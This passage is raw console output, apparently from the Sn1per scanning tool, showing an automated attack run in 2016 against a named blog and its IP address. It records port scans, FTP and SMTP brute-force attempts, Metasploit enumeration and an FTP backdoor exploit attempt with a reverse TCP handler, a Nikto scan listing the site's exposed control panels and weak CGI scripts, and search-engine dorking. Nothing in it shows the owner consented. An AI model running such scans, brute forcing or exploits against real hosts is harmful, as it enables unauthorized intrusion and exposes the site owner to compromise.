  1899. ___) | |_| | |_) | | \__ \ |_ ___) | |
  1900. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
  1901.  
  1902. # Fast Subdomains Enumeration tool using Search Engines and BruteForce
  1903. # Coded By Ahmed Aboul-Ela - @aboul3la
  1904. # Special Thanks to Ibrahim Mosaad - @ibrahim_mosaad for his contributions
  1905.  
  1906. [-] Enumerating subdomains now for thegarageblog.co.uk
  1907. [-] verbosity is enabled, will show the subdomains results in realtime
  1908. [-] Searching now in Baidu..
  1909. [-] Searching now in Yahoo..
  1910. [-] Searching now in Google..
  1911. [-] Searching now in Bing..
  1912. [-] Searching now in Ask..
  1913. [-] Searching now in Netcraft..
  1914. [-] Searching now in DNSdumpster..
  1915.  
  1916. ################################### Pinging host ###################################
  1917. PING thegarageblog.co.uk (192.254.237.91) 56(84) bytes of data.
  1918. 64 bytes from 192.254.237.91 (192.254.237.91): icmp_seq=1 ttl=51 time=223 ms
  1919.  
  1920. --- thegarageblog.co.uk ping statistics ---
  1921. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  1922. rtt min/avg/max/mdev = 223.064/223.064/223.064/0.000 ms
  1923.  
  1924. ################################### Running TCP port scan ##########################
  1925.  
  1926. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-11 10:16 EEST
  1927. Nmap scan report for thegarageblog.co.uk (192.254.237.91)
  1928. Host is up (0.23s latency).
  1929. Not shown: 23 closed ports, 6 filtered ports
  1930. PORT STATE SERVICE
  1931. 21/tcp open ftp
  1932. 25/tcp open smtp
  1933. 80/tcp open http
  1934. 110/tcp open pop3
  1935. 443/tcp open https
  1936. 3306/tcp open mysql
  1937. 8080/tcp open http-proxy
  1938. 8443/tcp open https-alt
  1939.  
  1940. Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds
  1941. ################################### Running UDP port scan ##########################
  1942.  
  1943. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-11 10:16 EEST
  1944. WARNING: a TCP scan type was requested, but no tcp ports were specified. Skipping this scan type.
  1945. Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds
  1946.  
  1947. ################################### Running Intrusive Scans ########################
  1948. + -- --=[Port 21 opened... running tests...
  1949.  
  1950. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-11 10:16 EEST
  1951. Nmap scan report for thegarageblog.co.uk (192.254.237.91)
  1952. Host is up (0.22s latency).
  1953. PORT STATE SERVICE VERSION
  1954. 21/tcp open ftp Pure-FTPd
  1955. | ftp-brute:
  1956. | Accounts: No valid accounts found
  1957. | Statistics: Performed 16 guesses in 66 seconds, average tps: 0
  1958. |_ ERROR: Too many retries, aborted ...
  1959.  
  1960. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1961. Nmap done: 1 IP address (1 host up) scanned in 67.55 seconds
  1962.  
  1963. IIIIII dTb.dTb _.---._
  1964. II 4' v 'B .'"".'/|\`.""'.
  1965. II 6. .P : .' / | \ `. :
  1966. II 'T;. .;P' '.' / | \ `.'
  1967. II 'T; ;P' `. / | \ .'
  1968. IIIIII 'YvP' `-.__|__.-'
  1969.  
  1970. I love shells --egypt
  1971.  
  1972.  
  1973. Taking notes in notepad? Have Metasploit Pro track & report
  1974. your progress and findings -- learn more on http://rapid7.com/metasploit
  1975.  
  1976. =[ metasploit v4.12.7-dev ]
  1977. + -- --=[ 1551 exploits - 898 auxiliary - 267 post ]
  1978. + -- --=[ 438 payloads - 38 encoders - 8 nops ]
  1979. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  1980.  
  1981. RHOST => thegarageblog.co.uk
  1982. RHOSTS => thegarageblog.co.uk
  1983. [*] thegarageblog.co.uk:21 - Banner: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  1984. 220-You are user number 6 of 150 allowed.
  1985. 220-Local time is now 02:17. Server port: 21.
  1986. 220-IPv6 connections are also welcome on this server.
  1987. 220 You will be disconnected after 15 minutes of inactivity.
  1988. [*] thegarageblog.co.uk:21 - USER: 331 User eX1b:) OK. Password required
  1989. [*] Exploit completed, but no session was created.
  1990. [*] Started reverse TCP double handler on 10.42.0.11:4444
  1991. [*] thegarageblog.co.uk:21 - Sending Backdoor Command
  1992. [*] Exploit completed, but no session was created.
  1993. + -- --=[Port 22 closed... skipping.
  1994. + -- --=[Port 23 closed... skipping.
  1995. + -- --=[Port 25 opened... running tests...
  1996.  
  1997. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-11 10:17 EEST
  1998. Nmap scan report for thegarageblog.co.uk (192.254.237.91)
  1999. Host is up (0.22s latency).
  2000. PORT STATE SERVICE VERSION
  2001. 25/tcp open smtp Exim smtpd 4.86_1
  2002. | smtp-brute:
  2003. | Accounts: No valid accounts found
  2004. | Statistics: Performed 10 guesses in 2 seconds, average tps: 5
  2005. |_ ERROR: Too many retries, aborted ...
  2006. |_smtp-commands: Couldn't establish connection on port 25
  2007. | smtp-enum-users:
  2008. |_ Couldn't find any accounts
  2009. |_smtp-open-relay: SMTP RSET: failed to receive data: connection closed
  2010. Service Info: Host: gator3130.hostgator.com
  2011.  
  2012. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2013. Nmap done: 1 IP address (1 host up) scanned in 33.02 seconds
  2014. Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
  2015.  
  2016. ----------------------------------------------------------
  2017. | Scan Information |
  2018. ----------------------------------------------------------
  2019.  
  2020. Mode ..................... VRFY
  2021. Worker Processes ......... 5
  2022. Usernames file ........... BruteX/wordlists/simple-users.txt
  2023. Target count ............. 1
  2024. Username count ........... 34
  2025. Target TCP port .......... 25
  2026. Query timeout ............ 5 secs
  2027. Target domain ............
  2028.  
  2029. ######## Scan started at Mon Jul 11 10:18:13 2016 #########
  2030. ######## Scan completed at Mon Jul 11 10:18:23 2016 #########
  2031. 0 results.
  2032.  
  2033. 34 queries in 10 seconds (3.4 queries / sec)
  2034.  
  2035. +-------------------------------------------------------+
  2036. | METASPLOIT by Rapid7 |
  2037. +---------------------------+---------------------------+
  2038. | __________________ | |
  2039. | ==c(______(o(______(_() | |""""""""""""|======[*** |
  2040. | )=\ | | EXPLOIT \ |
  2041. | // \\ | |_____________\_______ |
  2042. | // \\ | |==[msf >]============\ |
  2043. | // \\ | |______________________\ |
  2044. | // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
  2045. | // \\ | ********************* |
  2046. +---------------------------+---------------------------+
  2047. | o O o | \'\/\/\/'/ |
  2048. | o O | )======( |
  2049. | o | .' LOOT '. |
  2050. | |^^^^^^^^^^^^^^|l___ | / _||__ \ |
  2051. | | PAYLOAD |""\___, | / (_||_ \ |
  2052. | |________________|__|)__| | | __||_) | |
  2053. | |(@)(@)"""**|(@)(@)**|(@) | " || " |
  2054. | = = = = = = = = = = = = | '--------------' |
  2055. +---------------------------+---------------------------+
  2056.  
  2057.  
  2058. Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
  2059. Learn more on http://rapid7.com/metasploit
  2060.  
  2061. =[ metasploit v4.12.7-dev ]
  2062. + -- --=[ 1551 exploits - 898 auxiliary - 267 post ]
  2063. + -- --=[ 438 payloads - 38 encoders - 8 nops ]
  2064. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  2065.  
  2066. RHOSTS => thegarageblog.co.uk
  2067. RHOST => thegarageblog.co.uk
  2068. [*] 192.254.237.91:25 - 192.254.237.91:25 Banner: 220-gator3130.hostgator.com ESMTP Exim 4.86_1 #1 Mon, 11 Jul 2016 02:18:38 -0500
  2069. 220-We do not authorize the use of this system to transport unsolicited,
  2070. 220 and/or bulk e-mail.
  2071. [*] 192.254.237.91:25 - 192.254.237.91:25 could not be enumerated (no EXPN, no VRFY, invalid RCPT)
  2072. [*] thegarageblog.co.uk:25 - Scanned 1 of 1 hosts (100% complete)
  2073. [*] Auxiliary module execution completed
  2074. + -- --=[Port 53 closed... skipping.
  2075. + -- --=[Port 79 closed... skipping.
  2076. + -- --=[Port 80 opened... running tests...
  2077. ################################### Checking for WAF ##############################
  2078.  
  2079. ^ ^
  2080. _ __ _ ____ _ __ _ _ ____
  2081. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  2082. | V V // o // _/ | V V // 0 // 0 // _/
  2083. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  2084. <
  2085. ...'
  2086.  
  2087. WAFW00F - Web Application Firewall Detection Tool
  2088.  
  2089. By Sandro Gauci && Wendel G. Henrique
  2090.  
  2091. Checking http://thegarageblog.co.uk
  2092. The site http://thegarageblog.co.uk is behind a ModSecurity (OWASP CRS)
  2093. Number of requests: 13
  2094.  
  2095. ################################### Gathering HTTP Info ###########################
  2096. ./whatweb: /usr/lib/ruby/vendor_ruby/rchardet/universaldetector.rb:39: invalid multibyte escape: /[\x80-\xFF]/ (SyntaxError)
  2097.  
  2098. __ ______ _____
  2099. \ \/ / ___|_ _|
  2100. \ /\___ \ | |
  2101. / \ ___) || |
  2102. /_/\_|____/ |_|
  2103.  
  2104. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  2105. + -- --=[Target: thegarageblog.co.uk:80
  2106. + -- --=[Site not vulnerable to Cross-Site Tracing!
  2107. + -- --=[Site not vulnerable to Host Header Injection!
  2108. + -- --=[Site vulnerable to Cross-Frame Scripting!
  2109. + -- --=[Site vulnerable to Clickjacking!
  2110.  
  2111. HTTP/1.1 405 Not Allowed
  2112. Server: nginx/1.10.1
  2113. Date: Mon, 11 Jul 2016 07:18:57 GMT
  2114. Content-Type: text/html
  2115. Content-Length: 173
  2116. Connection: close
  2117.  
  2118. <html>
  2119. <head><title>405 Not Allowed</title></head>
  2120. <body bgcolor="white">
  2121. <center><h1>405 Not Allowed</h1></center>
  2122. <hr><center>nginx/1.10.1</center>
  2123. </body>
  2124. </html>
  2125.  
  2126. HTTP/1.1 200 OK
  2127. Server: nginx/1.10.1
  2128. Date: Mon, 11 Jul 2016 07:18:58 GMT
  2129. Content-Type: text/html; charset=UTF-8
  2130. Transfer-Encoding: chunked
  2131. Connection: keep-alive
  2132. Link: <http://thegarageblog.co.uk/wp-json/>; rel="https://api.w.org/"
  2133.  
  2134. d6
  2135. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2136. <html xmlns="http://www.w3.org/1999/xhtml">
  2137. <head>
  2138. <meta http-equiv="Content-Type" content="
  2139.  
  2140.  
  2141.  
  2142.  
  2143. ################################### Checking HTTP Headers #########################
  2144. + -- --=[Checking if X-Content options are enabled on thegarageblog.co.uk...
  2145.  
  2146. + -- --=[Checking if X-Frame options are enabled on thegarageblog.co.uk...
  2147.  
  2148. + -- --=[Checking if X-XSS-Protection header is enabled on thegarageblog.co.uk...
  2149.  
  2150. + -- --=[Checking HTTP methods on thegarageblog.co.uk...
  2151.  
  2152. + -- --=[Checking if TRACE method is enabled on thegarageblog.co.uk...
  2153.  
  2154. + -- --=[Checking for open proxy on thegarageblog.co.uk...
  2155. <head>
  2156. <meta name="robots" content="noarchive" />
  2157. <meta name="googlebot" content="nosnippet" />
  2158. </head>
  2159. <body>
  2160. <div align=center>
  2161. <h3>Error. Page cannot be displayed. Please contact your service provider for more details. (9)</h3>
  2162. </div>
  2163. </body>
  2164. </html>
  2165. + -- --=[Enumerating software on thegarageblog.co.uk...
  2166. Server: nginx/1.10.1
  2167.  
  2168. + -- --=[Checking if Strict-Transport-Security is enabled on thegarageblog.co.uk...
  2169.  
  2170. + -- --=[Checking for Flash cross-domain policy on thegarageblog.co.uk...
  2171. var mejsL10n = {"language":"en-US","strings":{"Close":"Close","Fullscreen":"Fullscreen","Download File":"Download File","Download Video":"Download Video","Play\/Pause":"Play\/Pause","Mute Toggle":"Mute Toggle","None":"None","Turn off Fullscreen":"Turn off Fullscreen","Go Fullscreen":"Go Fullscreen","Unmute":"Unmute","Mute":"Mute","Captions\/Subtitles":"Captions\/Subtitles"}};
  2172. var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/"};
  2173. /* ]]> */
  2174. </script>
  2175. <script type='text/javascript' src='http://thegarageblog.co.uk/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=2.18.1-a'></script>
  2176. <script type='text/javascript' src='http://thegarageblog.co.uk/wp-includes/js/comment-reply.min.js?ver=4.4.4'></script>
  2177. <script type='text/javascript' src='http://thegarageblog.co.uk/wp-includes/js/wp-embed.min.js?ver=4.4.4'></script>
  2178.  
  2179. </body>
  2180. </html>
  2181. + -- --=[Checking for Silverlight cross-domain policy on thegarageblog.co.uk...
  2182. var mejsL10n = {"language":"en-US","strings":{"Close":"Close","Fullscreen":"Fullscreen","Download File":"Download File","Download Video":"Download Video","Play\/Pause":"Play\/Pause","Mute Toggle":"Mute Toggle","None":"None","Turn off Fullscreen":"Turn off Fullscreen","Go Fullscreen":"Go Fullscreen","Unmute":"Unmute","Mute":"Mute","Captions\/Subtitles":"Captions\/Subtitles"}};
  2183. var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/"};
  2184. /* ]]> */
  2185. </script>
  2186. <script type='text/javascript' src='http://thegarageblog.co.uk/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=2.18.1-a'></script>
  2187. <script type='text/javascript' src='http://thegarageblog.co.uk/wp-includes/js/comment-reply.min.js?ver=4.4.4'></script>
  2188. <script type='text/javascript' src='http://thegarageblog.co.uk/wp-includes/js/wp-embed.min.js?ver=4.4.4'></script>
  2189.  
  2190. </body>
  2191. </html>
  2192. + -- --=[Checking for HTML5 cross-origin resource sharing on thegarageblog.co.uk...
  2193.  
  2194. + -- --=[Retrieving robots.txt on thegarageblog.co.uk...
  2195. User-agent: *
  2196. Disallow: /wp-admin/
  2197. Allow: /wp-admin/admin-ajax.php
  2198.  
  2199. + -- --=[Retrieving sitemap.xml on thegarageblog.co.uk...
  2200. var mejsL10n = {"language":"en-US","strings":{"Close":"Close","Fullscreen":"Fullscreen","Download File":"Download File","Download Video":"Download Video","Play\/Pause":"Play\/Pause","Mute Toggle":"Mute Toggle","None":"None","Turn off Fullscreen":"Turn off Fullscreen","Go Fullscreen":"Go Fullscreen","Unmute":"Unmute","Mute":"Mute","Captions\/Subtitles":"Captions\/Subtitles"}};
  2201. var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/"};
  2202. /* ]]> */
  2203. </script>
  2204. <script type='text/javascript' src='http://thegarageblog.co.uk/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=2.18.1-a'></script>
  2205. <script type='text/javascript' src='http://thegarageblog.co.uk/wp-includes/js/comment-reply.min.js?ver=4.4.4'></script>
  2206. <script type='text/javascript' src='http://thegarageblog.co.uk/wp-includes/js/wp-embed.min.js?ver=4.4.4'></script>
  2207.  
  2208. </body>
  2209. </html>
  2210. + -- --=[Checking cookie attributes on thegarageblog.co.uk...
  2211.  
  2212. + -- --=[Checking for ASP.NET Detailed Errors on thegarageblog.co.uk...
  2213. <body class="error404">
  2214. <body class="error404">
  2215.  
  2216.  
  2217. ################################### Running Web Vulnerability Scan ################
  2218. - Nikto v2.1.6
  2219. ---------------------------------------------------------------------------
  2220. + Target IP: 192.254.237.91
  2221. + Target Hostname: thegarageblog.co.uk
  2222. + Target Port: 80
  2223. + Start Time: 2016-07-11 10:19:16 (GMT3)
  2224. ---------------------------------------------------------------------------
  2225. + Server: nginx/1.10.1
  2226. + The anti-clickjacking X-Frame-Options header is not present.
  2227. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  2228. + Uncommon header 'link' found, with contents: <http://thegarageblog.co.uk/wp-json/>; rel="https://api.w.org/"
  2229. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  2230. + Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
  2231. + Entry '/wp-admin/admin-ajax.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  2232. + "robots.txt" contains 2 entries which should be manually viewed.
  2233. + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
  2234. + /cgi-sys/formmail.cgi: The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.
  2235. + /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
  2236. + /webmail/blank.html: IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
  2237. + /securecontrolpanel/: Web Server Control Panel
  2238. + /webmail/: Web based mail package installed.
  2239. + /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server
  2240. + OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
  2241. + OSVDB-2117: /cpanel/: Web-based control panel
  2242. + OSVDB-3092: /cgi-sys/entropysearch.cgi?query=asdfasdf&user=root&basehref=%2F%2Fwww.yourdomain.com/: CPanel's Entropy Search allows username enumeration via the user parameter.
  2243. + OSVDB-3092: /cgi-sys/FormMail-clone.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
  2244. + OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
  2245. + OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
  2246.  
  2247. + OSVDB-3093: /webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
  2248. + OSVDB-62684: /wp-content/plugins/hello.php: The WordPress hello.php plugin reveals a file system path
  2249. + /readme.html: This WordPress file reveals the installed version.
  2250. + /wp-links-opml.php: This WordPress script reveals the installed version.
  2251. + OSVDB-3092: /license.txt: License file found may identify site software.
  2252. + /controlpanel/: Admin login page/section found.
  2253. + /wordpress/: A Wordpress installation was found.
  2254. + OSVDB-3268: /wp-content/uploads/: Directory indexing found.
  2255. + /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
  2256. + /fantastico_fileslist.txt: fantastico_fileslist.txt file found. This file contains a list of all the files from the current directory.
  2257. + Server leaks inodes via ETags, header found with file /cgi-bin/c99.php, fields: 0x56a90723 0x16e2
  2258.  
  2259. + 9127 requests: 0 error(s) and 31 item(s) reported on remote host
  2260. + End Time: 2016-07-11 11:54:02 (GMT3) (5686 seconds)
  2261. ---------------------------------------------------------------------------
  2262. + 1 host(s) tested
  2263. ################################### Saving Web Screenshots ########################
  2264. [+] Screenshot saved to /root/Sn1per/loot/thegarageblog.co.uk-port80.jpg
  2265.  
  2266. (cutycapt:30735): Gtk-WARNING **: Theme directory devices/scalable of theme maia has no size field
  2267.  
  2268. ################################### Running Google Hacking Queries #############
  2269. ################################### Running InUrlBR OSINT Queries ##############
  2270.  
  2271. _____ .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
  2272. (_____) 01 01N. C 01 C 01 .01. 01 01 Yb 01 .01.
  2273. (() ()) 01 C YCb C 01 C 01 ,C9 01 01 dP 01 ,C9
  2274. \ / 01 C .CN. C 01 C 0101dC9 01 01'''bg. 0101dC9
  2275. \ / 01 C .01.C 01 C 01 YC. 01 , 01 .Y 01 YC.
  2276. /=\ 01 C Y01 YC. ,C 01 .Cb. 01 ,C 01 ,9 01 .Cb.
  2277. [___] .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
  2278.  
  2279. __[ ! ] Neither war between hackers, nor peace for the system.
  2280. __[ ! ] http://blog.inurl.com.br
  2281. __[ ! ] http://fb.com/InurlBrasil
  2282. __[ ! ] http://twitter.com/@googleinurl
  2283. __[ ! ] http://github.com/googleinurl
  2284. __[ ! ] Current PHP version::[ 5.6.22-2 ]
  2285. __[ ! ] Current script owner::[ root ]
  2286. __[ ! ] Current uname::[ Linux anonymous 4.6.0-parrot-amd64 #1 SMP Parrot 4.6.2-2parrot0 (2016-06-29) x86_64 ]
  2287. __[ ! ] Current pwd::[ /root/Sn1per ]
  2288. __[ ! ] Help: php inurlbr.php --help
  2289. ------------------------------------------------------------------------------------------------------------------------
  2290.  
  2291. [ ! ] Starting SCANNER INURLBR 2.1 at [11-07-2016 11:54:20]
  2292. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  2293. It is the end user's responsibility to obey all applicable local, state and federal laws.
  2294. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  2295.  
  2296. [ INFO ][ OUTPUT FILE ]:: [ /root/Sn1per/output/loot/inurlbr-thegarageblog.co.uk.txt ]
  2297. [ INFO ][ DORK ]::[ site:thegarageblog.co.uk ]
  2298. [ INFO ][ SEARCHING ]:: {
  2299. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.cg ]
  2300.  
  2301. [ INFO ][ SEARCHING ]::
  2302. -[:::]
  2303. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  2304.  
  2305. [ INFO ][ SEARCHING ]::
  2306. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  2307. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.la ID: 010479943387663786936:wjwf2xkhfmq ]
  2308.  
  2309. [ INFO ][ SEARCHING ]::
  2310. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  2311.  
  2312. [ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
  2313.  
  2314.  
  2315. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2316. |_[ + ] [ 0 / 100 ]-[11:54:41] [ - ]
  2317. |_[ + ] Target:: [ http://thegarageblog.co.uk/ ]
  2318. |_[ + ] Exploit::
  2319. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2320. |_[ + ] More details:: / - / , ISP:
  2321. |_[ + ] Found:: UNIDENTIFIED
  2322.  
  2323. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2324. |_[ + ] [ 1 / 100 ]-[11:54:43] [ - ]
  2325. |_[ + ] Target:: [ http://thegarageblog.co.uk/page/2/ ]
  2326. |_[ + ] Exploit::
  2327. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2328. |_[ + ] More details:: / - / , ISP:
  2329. |_[ + ] Found:: UNIDENTIFIED
  2330.  
  2331. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2332. |_[ + ] [ 2 / 100 ]-[11:54:44] [ - ]
  2333. |_[ + ] Target:: [ http://thegarageblog.co.uk/page/32/ ]
  2334. |_[ + ] Exploit::
  2335. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2336. |_[ + ] More details:: / - / , ISP:
  2337. |_[ + ] Found:: UNIDENTIFIED
  2338.  
  2339. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2340. |_[ + ] [ 3 / 100 ]-[11:54:46] [ - ]
  2341. |_[ + ] Target:: [ http://thegarageblog.co.uk/page/36/ ]
  2342. |_[ + ] Exploit::
  2343. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2344. |_[ + ] More details:: / - / , ISP:
  2345. |_[ + ] Found:: UNIDENTIFIED
  2346.  
  2347. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2348. |_[ + ] [ 4 / 100 ]-[11:54:47] [ - ]
  2349. |_[ + ] Target:: [ http://thegarageblog.co.uk/page/4/ ]
  2350. |_[ + ] Exploit::
  2351. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2352. |_[ + ] More details:: / - / , ISP:
  2353. |_[ + ] Found:: UNIDENTIFIED
  2354.  
  2355. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2356. |_[ + ] [ 5 / 100 ]-[11:54:49] [ - ]
  2357. |_[ + ] Target:: [ http://thegarageblog.co.uk/page/9/ ]
  2358. |_[ + ] Exploit::
  2359. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2360. |_[ + ] More details:: / - / , ISP:
  2361. |_[ + ] Found:: UNIDENTIFIED
  2362.  
  2363. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2364. |_[ + ] [ 6 / 100 ]-[11:54:50] [ - ]
  2365. |_[ + ] Target:: [ http://thegarageblog.co.uk/page/3/ ]
  2366. |_[ + ] Exploit::
  2367. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2368. |_[ + ] More details:: / - / , ISP:
  2369. |_[ + ] Found:: UNIDENTIFIED
  2370.  
  2371. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2372. |_[ + ] [ 7 / 100 ]-[11:54:52] [ - ]
  2373. |_[ + ] Target:: [ http://thegarageblog.co.uk/page/30/ ]
  2374. |_[ + ] Exploit::
  2375. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2376. |_[ + ] More details:: / - / , ISP:
  2377. |_[ + ] Found:: UNIDENTIFIED
  2378.  
  2379. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2380. |_[ + ] [ 8 / 100 ]-[11:54:53] [ - ]
  2381. |_[ + ] Target:: [ http://thegarageblog.co.uk/advertising/ ]
  2382. |_[ + ] Exploit::
  2383. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2384. |_[ + ] More details:: / - / , ISP:
  2385. |_[ + ] Found:: UNIDENTIFIED
  2386.  
  2387. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2388. |_[ + ] [ 9 / 100 ]-[11:54:55] [ - ]
  2389. |_[ + ] Target:: [ http://thegarageblog.co.uk/the-garage/ ]
  2390. |_[ + ] Exploit::
  2391. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2392. |_[ + ] More details:: / - / , ISP:
  2393. |_[ + ] Found:: UNIDENTIFIED
  2394.  
  2395. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2396. |_[ + ] [ 10 / 100 ]-[11:54:56] [ - ]
  2397. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/garage/ ]
  2398. |_[ + ] Exploit::
  2399. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2400. |_[ + ] More details:: / - / , ISP:
  2401. |_[ + ] Found:: UNIDENTIFIED
  2402.  
  2403. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2404. |_[ + ] [ 11 / 100 ]-[11:54:58] [ - ]
  2405. |_[ + ] Target:: [ http://thegarageblog.co.uk/category/garage/ ]
  2406. |_[ + ] Exploit::
  2407. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2408. |_[ + ] More details:: / - / , ISP:
  2409. |_[ + ] Found:: UNIDENTIFIED
  2410.  
  2411. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2412. |_[ + ] [ 12 / 100 ]-[11:54:59] [ - ]
  2413. |_[ + ] Target:: [ http://thegarageblog.co.uk/author/admin/ ]
  2414. |_[ + ] Exploit::
  2415. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2416. |_[ + ] More details:: / - / , ISP:
  2417. |_[ + ] Found:: UNIDENTIFIED
  2418.  
  2419. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2420. |_[ + ] [ 13 / 100 ]-[11:55:01] [ - ]
  2421. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/battery/ ]
  2422. |_[ + ] Exploit::
  2423. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2424. |_[ + ] More details:: / - / , ISP:
  2425. |_[ + ] Found:: UNIDENTIFIED
  2426.  
  2427. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2428. |_[ + ] [ 14 / 100 ]-[11:55:02] [ - ]
  2429. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/mot/ ]
  2430. |_[ + ] Exploit::
  2431. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2432. |_[ + ] More details:: / - / , ISP:
  2433. |_[ + ] Found:: UNIDENTIFIED
  2434.  
  2435. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2436. |_[ + ] [ 15 / 100 ]-[11:55:03] [ - ]
  2437. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/engine/ ]
  2438. |_[ + ] Exploit::
  2439. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2440. |_[ + ] More details:: / - / , ISP:
  2441. |_[ + ] Found:: UNIDENTIFIED
  2442.  
  2443. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2444. |_[ + ] [ 16 / 100 ]-[11:55:05] [ - ]
  2445. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/failure/ ]
  2446. |_[ + ] Exploit::
  2447. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2448. |_[ + ] More details:: / - / , ISP:
  2449. |_[ + ] Found:: UNIDENTIFIED
  2450.  
  2451. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2452. |_[ + ] [ 17 / 100 ]-[11:55:06] [ - ]
